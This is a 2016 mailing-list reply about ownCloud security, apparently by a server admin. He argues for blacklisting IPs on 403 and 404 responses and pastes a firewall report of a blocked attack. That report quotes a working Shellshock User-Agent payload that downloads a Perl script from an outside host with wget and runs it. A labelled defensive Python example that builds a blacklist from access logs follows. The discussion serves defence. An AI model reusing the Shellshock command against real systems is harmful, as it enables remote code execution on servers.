IMHO - dynamic DNS is a lame excuse for security. You could just install Windows + 2 AV and claim it is more secure (which is crap of course).
Static IP is OK IMHO. What is required is for the system to have an active defense, and that can only be achieved if the owncloud system has access to the firewall somehow. Dynamic blacklisting, for example.

A very simple approach, for example, would be to use the return codes of the web server:
- 403 - access denied would mean someone is trying to access a resource without proper permissions -> enter client-IP into a blacklist for 24 hours
- 404 - someone is accessing a non-existing resource. This is typical for resource probing (check /admin/config.php for example). If that file does not exist, this is definitely resource probing for a following attack.

That is something websites should develop and include in their code.

I went even further on my site with that. Having also dedicated access to my firewall, I do not only block the client-IP, but also terminate all existing connections at the same time.
I have of course a way more complex system setup - also based on URL reputation. After the first attack that came in, the request-URL is stored in a DB, and based on if I have configured that URL to not lock the requester, the first attempt will lock the client-IP hard immediately.
Have an average of 4000 attack vectors (that's what I call these URLs) per year.

Look at the below attack attempt I had - the system has locked it down hard in the attempt.

Dear Admin,

The following new blacklist entry has been submitted.
You might got to the Details page by following this link
https://stargate.solsys.org/admin.php?op=blacklist&action=edit&position=0&blacklist=177.140.117.69

Blacklist Content
================================================================================
-> 2016-05-29 @ 14:35:47 Breaking attempt ?
Module/Function: core/error
User Agent: () { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo 333:; cd /tmp;wget http://www.saninji.jp/files/.config/b.txt;perl b.txt; rm - rf b.txt; echo 333:; id;"
Referer:
Request: /cgi-bin/status/status.cgi

Firewall report:
* Entered IP 177.140.117.69 into blacklist
- Removed active connection *2CA02 [177.140.117.69:23309 -> 192.168.1.2:443]
- Removed active connection *2CA0A [177.140.117.69:9920 -> 192.168.1.2:80]
- Removed active connection *2CA0C [177.140.117.69:25142 -> 192.168.1.2:443]
- Removed active connection *2CA2F [177.140.117.69:46762 -> 192.168.1.2:80]
- Removed active connection *2CA30 [177.140.117.69:24306 -> 192.168.1.2:443]
- Removed active connection *2CA3B [177.140.117.69:37394 -> 192.168.1.2:443]

I stopped putting systems I have not developed or at least thoroughly tested myself directly onto the net. I still do not trust owncloud enough to put it on the net. No active defenses :}

On Tuesday, May 31, 2016 12:33:42 AM CEST Andreas Hechenberger wrote:
> Hey Alvar and rest,
>
> I am not sure if it is a good idea to have fixed IP addresses because
> this allows more attacks (spoofing etc.) and providers/companies etc.
> could also slow down or worse block the traffic to those IPs.
>
> it could be nice to have both ^^
> @Michal write your own script which adds/removes the IPs dynamically to
> your firewall. I know it's a hacky workaround but it could work ^^
>
> Servus
> Andy
>
> On 05/30/2016 06:40 PM, Alvar Freude wrote:
> > On 2016-05-30 18:11, Stefan Schwarz wrote:
> >> Owncloud does not provide you with a dyndns-service which could list
> >> your server.
> >
> > He has another problem: his internal OwnCloud server should contact the
> > outside Owncloud update servers, but outgoing connections are
> > firewalled. He does not use, as far as I understand, a home server with
> > DynDNS. In contrast to many PHP-installations, he blocks outgoing traffic
> > on purpose.
> >
> > This is a good idea.
> > A very good idea.
> >
> >
> > But AFAIK it is not guaranteed, which server/IP OwnCloud contacts for
> > updating etc. Some apps may contact their own server, the core contacts
> > some AWS IPs, which may change?
> >
> > Because of this, I use a proxy. Owncloud itself is here in a FreeBSD
> > Jail with private IP on private interface lo23, but with the correct
> > proxy setting it can connect everywhere. This is not a very good config,
> > because security by obscurity – but better than nothing (a typical
> > script kiddie attacker who 0wned my OwnCloud would try to access outside
> > directly).
> >
> >
> > So, it would be a good idea, if OwnCloud defines fixed systems which may
> > be contacted by the Owncloud Core Application and Apps by default.
> >
> >
> > Ciao
> >
> > Alvar

--
Stop searching forever. Happiness is just next to you.
------------------------------------------------------------------------
Joerg Mertin in Clermont/France
Web: http://www.solsys.org - Linux user #172509
PGP: Public Key Server - Get "0x159DC660F946126F"
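
Added example, not part of the original message and not the author's own system: a minimal version of the status-code blacklisting described above, run over combined-format access log lines. The log format, the PROBE_URLS set (standing in for the "URL reputation" DB), the MAX_404 threshold and the ALLOWLIST are assumptions; the returned mapping is what a firewall hook would consume.

```python
import ipaddress
import re
from collections import Counter
from datetime import datetime, timedelta

BLOCK_FOR = timedelta(hours=24)      # lock duration named in the post
PROBE_URLS = {"/admin/config.php", "/cgi-bin/status/status.cgi"}  # assumed reputation list
MAX_404 = 3                          # assumption: tolerate a few honest broken links
ALLOWLIST = {ipaddress.ip_address("192.168.1.2")}  # assumption: never lock out own hosts

# Combined log format: ip - - [time] "METHOD path PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3}) ')

def build_blacklist(lines):
    """Return {ip: lock expiry} for clients that tripped the 403/404 rules."""
    blacklist, misses = {}, Counter()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue                 # unparseable line: skip, never guess
        raw_ip, stamp, path, status = m.groups()
        try:
            ip = ipaddress.ip_address(raw_ip)  # validate before it nears a firewall rule
        except ValueError:
            continue
        if ip in ALLOWLIST:
            continue
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        path = path.split("?", 1)[0]           # reputation is keyed on the path only
        hit = status == "403" or (status == "404" and path in PROBE_URLS)
        if status == "404" and not hit:
            misses[ip] += 1                    # unknown URL: count before locking
            hit = misses[ip] >= MAX_404
        if hit:
            blacklist[ip] = when + BLOCK_FOR   # a repeat offence extends the lock
    return blacklist

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [29/May/2016:14:35:47 +0200] "GET /cgi-bin/status/status.cgi HTTP/1.1" 404 162 "-" "-"',
    '198.51.100.9 - - [29/May/2016:14:36:00 +0200] "GET /favicon.ico HTTP/1.1" 404 162 "-" "-"',
    '198.51.100.20 - - [29/May/2016:14:37:10 +0200] "GET /data/secret.txt HTTP/1.1" 403 199 "-" "-"',
    '192.168.1.2 - - [29/May/2016:14:38:00 +0200] "GET /private HTTP/1.1" 403 199 "-" "-"',
]

if __name__ == "__main__":
    for ip, until in build_blacklist(SAMPLE).items():
        print(f"{ip} locked until {until.isoformat()}")
```

Validating the address with ipaddress before use matters because the log line is attacker-influenced input, and the allowlist guards against a proxy or monitoring host locking itself out.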
